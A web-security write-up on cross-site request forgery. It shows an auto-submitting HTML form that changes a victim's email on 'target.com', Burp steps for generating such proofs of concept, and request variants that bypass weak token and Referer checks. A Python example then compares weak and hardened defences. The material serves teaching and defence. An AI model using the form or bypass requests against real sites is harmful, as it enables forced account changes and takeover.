Cross-Site Request Forgery — CSRF

POST /email/change HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=3f3b074907edbba29fb6d6c643644a2e

email=abc@123.com
<html>
<body>
<form action="https://target.com/email/change" method="POST">
<input type="hidden" name="email" value="abc@123.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
  1. Intercept the vulnerable request
  2. Right-click to open the context menu
  3. Select Engagement tools > Generate CSRF PoC.
  1. Validation depends on the request method: some applications validate the CSRF token when the action is sent as a POST request, but not when the same action is sent as a GET request.
# Normal request with POST method
POST /email/change HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Cookie: session=3f3b074907edbba29fb6d6c643644a2e

csrf=gh1lLkp9H0paQLmytacNbytBNKlw&email=abc@123.com
# Modified request from POST to GET
GET /email/change?email=abc@123.com HTTP/1.1
Host: target.com
Cookie: session=3f3b074907edbba29fb6d6c643644a2e
# Request without CSRF token
POST /email/change HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Cookie: session=3f3b074907edbba29fb6d6c643644a2e

email=abc@123.com
# Token in the body does not match the csrf cookie
POST /email/change HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Cookie: session=3f3b074907edbba29fb6d6c643644a2e;csrf=kLwJo4MsnMsbH8nks7KhszAfw2xVxe2f

csrf=Jka2NJ3kmnO3KLk7kHs04Kls1aSemc5L&email=abc@123.com
# Token in the body matches the csrf cookie
POST /email/change HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Cookie: session=3f3b074907edbba29fb6d6c643644a2e;csrf=kLwJo4MsnMsbH8nks7KhszAfw2xVxe2f

csrf=kLwJo4MsnMsbH8nks7KhszAfw2xVxe2f&email=abc@123.com
# Request with Referer header
POST /email/change HTTP/1.1
Host: target.com
Referer: https://target.com/email
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=3f3b074907edbba29fb6d6c643644a2e

email=abc@123.com
# Referer values from another origin that still contain the string target.com
referer: http://target.com.my-website.com/abc
referer: http://my-website.com/abc?target.com
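The requests above exercise four weak validation patterns: a token that is checked only for POST, a missing token that is accepted, a token that is compared against a cookie the client itself supplies, and a Referer check done by substring. The Python below is an added example, not code from the original write-up: it models a minimal request object and puts each weak check beside a hardened one, then replays the request variants shown above against both. The server key, the Request class and all function names are constructed for this illustration; the session cookie, the token pair and the Referer values are taken from the requests above.

```python
import hashlib
import hmac
from dataclasses import dataclass, field
from typing import Dict
from urllib.parse import parse_qs, urlsplit

# Constructed for this example: a fixed server key (a real deployment loads it
# from a secret store); host and session cookie come from the requests above.
SERVER_KEY = b"constructed-example-key-not-for-production"
SITE_HOST = "target.com"
SESSION = "3f3b074907edbba29fb6d6c643644a2e"


@dataclass
class Request:
    """Minimal stand-in for an HTTP request as the server sees it."""
    method: str
    target: str                                  # e.g. /email/change?email=...
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""

    def cookies(self) -> Dict[str, str]:
        out: Dict[str, str] = {}
        for part in self.headers.get("Cookie", "").split(";"):
            if "=" in part:
                k, v = part.strip().split("=", 1)
                out[k] = v
        return out

    def params(self) -> Dict[str, str]:
        # Form body for POST, query string for GET; first value wins.
        src = self.body if self.method == "POST" else urlsplit(self.target).query
        return {k: v[0] for k, v in parse_qs(src).items()}


def issue_csrf_token(session_id: str) -> str:
    """Session-bound token: HMAC-SHA256 of the session id under the server key."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def weak_csrf_check(req: Request) -> bool:
    """The three weak token patterns exercised above, in one function."""
    if req.method != "POST":                     # 1. only POST is validated
        return True
    token = req.params().get("csrf")
    if token is None:                            # 2. absent token is accepted
        return True
    return token == req.cookies().get("csrf")    # 3. compared to a client-set cookie


def weak_referer_check(req: Request) -> bool:
    """Substring match: passes target.com.my-website.com and ...?target.com."""
    return SITE_HOST in req.headers.get("Referer", "")


def strong_csrf_check(req: Request) -> bool:
    """Method-independent, fail-closed, session-bound token check."""
    if req.method != "POST":                     # state changes only via POST
        return False
    session = req.cookies().get("session")
    token = req.params().get("csrf")
    if not session or not token:                 # fail closed on anything missing
        return False
    # Nobody but the server can compute HMAC(key, session), so a self-minted
    # cookie/body pair fails here even though its two values match each other.
    return hmac.compare_digest(token.encode(), issue_csrf_token(session).encode())


def strong_referer_check(req: Request) -> bool:
    """Parse the Referer and compare scheme and host exactly, never by substring."""
    ref = req.headers.get("Referer")
    if ref is None:                              # policy choice: no Referer, no change
        return False
    parts = urlsplit(ref)
    return parts.scheme == "https" and parts.hostname == SITE_HOST


def authorize_email_change(req: Request) -> bool:
    return strong_csrf_check(req) and strong_referer_check(req)


def sample_requests() -> Dict[str, Request]:
    """The request variants shown above, rebuilt as Request objects."""
    base = {"Host": SITE_HOST, "Cookie": f"session={SESSION}",
            "Referer": "https://target.com/email"}
    good = issue_csrf_token(SESSION)
    minted = "kLwJo4MsnMsbH8nks7KhszAfw2xVxe2f"   # client-chosen token pair from above
    return {
        "legit": Request("POST", "/email/change", base, f"csrf={good}&email=abc@123.com"),
        "as_get": Request("GET", "/email/change?email=abc@123.com", base),
        "no_token": Request("POST", "/email/change", base, "email=abc@123.com"),
        "minted_pair": Request("POST", "/email/change",
                               {**base, "Cookie": f"session={SESSION};csrf={minted}"},
                               f"csrf={minted}&email=abc@123.com"),
        "bad_referer": Request("POST", "/email/change",
                               {**base, "Referer": "http://target.com.my-website.com/abc"},
                               f"csrf={good}&email=abc@123.com"),
    }


if __name__ == "__main__":
    for name, req in sample_requests().items():
        print(name, "weak:", weak_csrf_check(req) and weak_referer_check(req),
              "strong:", authorize_email_change(req))
```

Running the block prints one line per variant: only the legitimate request passes the hardened checks, while the GET rewrite, the token-less request, the self-minted cookie/body pair and the look-alike Referer all pass the weak ones. In a real application the token check is normally combined with SameSite cookie attributes and an Origin header check; the Referer comparison is kept here because it is the check the write-up exercises.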

Hardeep Singh Sandhu